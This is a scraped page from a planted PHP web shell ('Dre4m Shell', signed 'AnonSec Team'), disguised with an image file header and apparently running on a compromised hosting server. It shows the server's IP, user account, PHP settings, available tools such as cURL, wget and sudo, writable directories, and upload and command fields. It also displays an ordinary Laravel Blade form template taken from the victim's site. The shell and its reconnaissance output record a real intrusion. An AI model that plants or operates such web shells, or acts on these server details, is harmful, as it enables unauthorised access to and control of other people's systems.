ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 3.139.80.52
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/fundscopied/resources/views/MasterRolePermission/subModule/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/fundscopied/resources/views/MasterRolePermission/subModule/edit.blade.php
@extends('layouts.layout')
@section('pageTitle')
Edit Sub Module
@endsection

@section('content')
<div id="page-wrapper" class="box box-default">
  <div class="container-fluid">
    <div class="col-md-12 text-success"><!--2nd col--> 
      <big><b>@yield('pageTitle')</b></big> </div>
    <br />
    <hr >
    <div class="row">
      <div class="col-md-9"> <br>
        @if (count($errors) > 0)
        <div class="alert alert-danger alert-dismissible" role="alert">
          <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span> </button>
          <strong>Error!</strong> @foreach ($errors->all() as $error)
          <p>{{ $error }}</p>
          @endforeach </div>
        @endif                       
        
        @if(session('message'))
        <div class="alert alert-success alert-dismissible" role="alert">
          <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span> </button>
          <strong>Success!</strong> {{ session('message') }}</div>
        @endif
        @if(session('error_message'))
        <div class="alert alert-error alert-dismissible" role="alert">
          <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span> </button>
          <strong>Error!</strong> {{ session('error_message') }}</div>
        @endif
        <form method="post" action="{{ url('/sub-module/update') }}" class="form-horizontal">
          {{ csrf_field() }}
          <div class="form-group">
            <label for="section" class="col-md-3 control-label">Select Module</label>
            <div class="col-md-9">
              <select name="module" class="form-control">
                
              @foreach($modules as $list)
              @if($list->moduleID == $edit->moduleID)

              <option value="{{$list->moduleID}}" selected="selected">{{$list->modulename}}</option>

              @else

              <option value="{{$list->moduleID}}">{{$list->modulename}}</option>

              @endif
              @endforeach
                          
              </select>
            </div>
          </div>
          <div class="form-group">
            <label for="section" class="col-md-3 control-label">Sub Module Name</label>
            <div class="col-md-9">
              <input id="name" type="text" class="form-control" name="subModule" value="{{ $edit->submodulename }}" required>
              <input id="name" type="hidden" class="form-control" name="subModuleID" value="{{ $edit->submoduleID }}" required>
            </div>
          </div>
          <div class="form-group">
            <label for="section" class="col-md-3 control-label">Route (URL)</label>
            <div class="col-md-9">
              <input id="route" type="text" class="form-control" name="route" value="{{ $edit->route }}" required>
            </div>
          </div>
          <div class="row">
            <div class="col-sm-6">
              <div class="form-group">
                <div class="col-sm-offset-3 col-sm-9">
                  <button type="submit" class="btn btn-success btn-sm pull-right">Edit</button>
                </div>
              </div>
            </div>
            <div class="col-sm-6">
              <div class="form-group">
                <div class="col-sm-offset-3 col-sm-9">
                  <a href="{{url('sub-module/create')}}" class="btn btn-default btn-sm pull-right">Cancel</a>
                </div>
              </div>
            </div>
          </div>

        </form>
      </div>
    </div>
  </div>
</div>
@endsection 

Anon7 - 2022
AnonSec Team